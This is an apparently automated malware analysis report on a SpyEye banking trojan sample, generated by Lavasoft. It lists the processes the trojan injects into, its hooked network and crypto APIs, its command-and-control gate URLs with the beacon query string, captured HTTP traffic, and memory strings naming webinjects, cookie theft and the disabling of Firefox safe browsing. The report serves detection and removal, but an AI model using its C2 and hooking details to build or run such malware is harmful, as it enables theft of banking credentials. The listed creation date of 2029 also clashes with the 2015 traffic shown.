HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.32521 (B) (Emsisoft), Gen:Variant.Kazy.32521 (AdAware), Trojan.Win32.Spyeye.FD, SpyEye.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 314df257f926d8d7d131544563571d92
SHA1: dcf023a17c07e2b0c1090ae3bd4f6fc457a8a138
SHA256: 86ca56311fc21d93dd677c5c377901dea39c68481aadfdd1e932ae410d4961f0
SSDeep: 3072:exUtCjHYfvmnER0GtD/QFhRh6apCPSMd7:exUtqSvmnER0GJGRsa bd7
Size: 123392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2029-04-02 18:36:32
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
trivax1.Bin.exe:432
The Trojan injects its code into the following process(es):
vmacthlp.exe:892
wmiprvse.exe:228
Explorer.EXE:532
winlogon.exe:680
lsass.exe:736
svchost.exe:904
svchost.exe:988
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process trivax1.Bin.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\trivax1.Bin\config.bin (3 bytes)
Registry activity
The process trivax1.Bin.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 7E 55 83 27 63 E9 27 B7 5B DF CA DA AD 27 E9"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetQueryDataAvailable
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpAddRequestHeadersA
HttpOpenRequestA
InternetQueryOptionA
The Trojan installs the following user-mode hooks in USER32.dll:
TranslateMessage
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
send
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtVdmControl
ZwSetInformationFile
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
trivax1.Bin.exe:432
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\trivax1.Bin\config.bin (3 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 136 | 512 | 0.691211 | 05eb2ee9fd78c459bac150406c9d6734 |
| .code | 8192 | 23271 | 23552 | 4.65819 | 887aa58c86d95fd81301b2bddd87dada |
| .edata | 32768 | 475 | 512 | 3.56191 | 446363ab4fe7aac775737b25e3d2422b |
| .rdata | 36864 | 64512 | 64512 | 5.5163 | 683e35bb0cf317380bbdf7f48b093449 |
| .data | 102400 | 369920 | 30208 | 5.43777 | fe5e368ca2091335cca4ccd38c01c7a6 |
| .rsrc | 475136 | 1080 | 1536 | 2.26764 | 473509a0bbead6cfe6c4fef23e26042c |
| .reloc | 479232 | 1320 | 1536 | 4.2587 | 906be8b7abf216c864f891a4debf0db7 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://hdredirect-lb-399551664.us-east-1.elb.amazonaws.com/user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online | |
| hxxp://www.hugedomains.com/domain_profile.cfm?d=traxbax&e=com | 216.38.220.22 |
| hxxp://traxbax.com/user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online | 52.1.21.126 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: traxbax.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Aug 2015 23:21:04 GMT
Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Content-Length: 182
Connection: keep-alive
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>..HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Mon, 17 Aug 2015 23:21:04 GMT..Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com..Server: Microsoft-IIS/8.0..X-Powered-By: ASP.NET..Content-Length: 182..Connection: keep-alive..<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>......
GET /user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: traxbax.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Aug 2015 23:21:33 GMT
Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Content-Length: 182
Connection: keep-alive
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>..HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Mon, 17 Aug 2015 23:21:33 GMT..Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com..Server: Microsoft-IIS/8.0..X-Powered-By: ASP.NET..Content-Length: 182..Connection: keep-alive..<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>....
GET /domain_profile.cfm?d=traxbax&e=com HTTP/1.1
User-Agent: Microsoft Internet Explorer
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.hugedomains.com
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Server: Microsoft-IIS/8.5
Set-Cookie: BTP=1; expires=Tue, 16-Aug-16 23:21:05 GMT; domain=hugedomains.com; path=/
Set-Cookie: CFID=193589; expires=Wed, 14-Aug-24 23:21:05 GMT; path=/; HttpOnly
Set-Cookie: CFTOKEN=60FA010B-CCEC-4208-BB81AB435E0B3AD2; expires=Wed, 14-Aug-24 23:21:05 GMT; path=/; HttpOnly
Set-Cookie: SHOPPINGCART=; expires=Wed, 16-Sep-15 23:21:05 GMT; path=/
Set-Cookie: REFLOC=; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: HD=862BCC9681034F64B8B97B3357033E8C014; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: FWO=vQIF2KwBCfaKGgX1oBAW6PgJWK74QEeu8VhbqbVEFuW9Bkq5+0Vbq+RFUrP4Qkqv/k9Yr/NFX7m0CVKo+zcp3fBDUq/5Rl7Y/0EopotMXdz6Rl+p+UZZ2/E2Wq/9; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: PV=+Aka/64QPPesAhk=; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: DE3OOK=bm8k7EthKsVCanSUDig6xkh+OcdJaSrPVXp0iEtvOtpjYSTPTmABx1MzHdxGdivPfyt760RhJIhOfQvBUzN5iE59C8FTTDvBUH0s3G5KdJ4BRyjDa2862ho0YA==; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 17 Aug 2015 23:21:13 GMT
Content-Length: 11342
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="hXXp://VVV.w3.org/1999/xhtml"> <head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>HugeDomains.com - TraxbaX.com is for sale (Traxba X)</title> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/common.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/v3.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/pages_v3b.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/styles_hd.css" /> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/common.js"></script> <script type="text/javascript" src="http://static.HugeDomains.com/js/common_v3.js"></script> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/jquery-1.5.1.min.js"></script> <script language="javascript"> function headerWindowLoad() { return true; } </script>..<script type="text/javascript">..var _gaq = _gaq || [];.._gaq.push(['_setAccount', 'UA-7117339-4']);.._gaq.push(['_trackPageview']);..(function() {..var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;..ga.src = ('https:' == document.location.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga.js';..var s = document.getElementsByTagName('script')[0]; s.parentNode.
<<< skipped >>>
GET /domain_profile.cfm?d=traxbax&e=com HTTP/1.1
User-Agent: Microsoft Internet Explorer
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.hugedomains.com
Cookie: BTP=1; CFID=193589; CFTOKEN=60FA010B-CCEC-4208-BB81AB435E0B3AD2; SHOPPINGCART=; REFLOC=; HD=862BCC9681034F64B8B97B3357033E8C014; FWO=vQIF2KwBCfaKGgX1oBAW6PgJWK74QEeu8VhbqbVEFuW9Bkq5+0Vbq+RFUrP4Qkqv/k9Yr/NFX7m0CVKo+zcp3fBDUq/5Rl7Y/0EopotMXdz6Rl+p+UZZ2/E2Wq/9; PV=+Aka/64QPPesAhk=; DE3OOK=bm8k7EthKsVCanSUDig6xkh+OcdJaSrPVXp0iEtvOtpjYSTPTmABx1MzHdxGdivPfyt760RhJIhOfQvBUzN5iE59C8FTTDvBUH0s3G5KdJ4BRyjDa2862ho0YA==
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Server: Microsoft-IIS/8.5
Set-Cookie: BTP=1; expires=Tue, 16-Aug-16 23:21:26 GMT; domain=hugedomains.com; path=/
Set-Cookie: FWO=vQIF2KwBCfaKGgX1oBAW6PgJWK74QEeu8VhbqbVEFuW9Bkq5+0Vbq+RFUrP4Qkqv/k9Yr/NHXLm0CVKo+zcp3fBDUq/5Rl7Y/0EopotMXdz6Rl+p+UZZ2/E2Wq/9; expires=Tue, 16-Aug-16 23:21:26 GMT; path=/
Set-Cookie: PV=+wka/64QPPesAhk=; expires=Tue, 16-Aug-16 23:21:26 GMT; path=/
Set-Cookie: SHOPPINGCART=; expires=Wed, 16-Sep-15 23:21:26 GMT; path=/
Set-Cookie: REFLOC=; expires=Tue, 16-Aug-16 23:21:26 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 17 Aug 2015 23:21:34 GMT
Content-Length: 11342
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="hXXp://VVV.w3.org/1999/xhtml"> <head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>HugeDomains.com - TraxbaX.com is for sale (Traxba X)</title> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/common.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/v3.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/pages_v3b.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/styles_hd.css" /> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/common.js"></script> <script type="text/javascript" src="http://static.HugeDomains.com/js/common_v3.js"></script> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/jquery-1.5.1.min.js"></script> <script language="javascript"> function headerWindowLoad() { return true; } </script>..<script type="text/javascript">..var _gaq = _gaq || [];.._gaq.push(['_setAccount', 'UA-7117339-4']);.._gaq.push(['_trackPageview']);..(function() {..var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;..ga.src = ('https:' == document.location.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga.js';..var s = document.getElementsByTagName('script')[0]; s.parentNode.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
wmiprvse.exe_228_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
%System%\WS2_32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
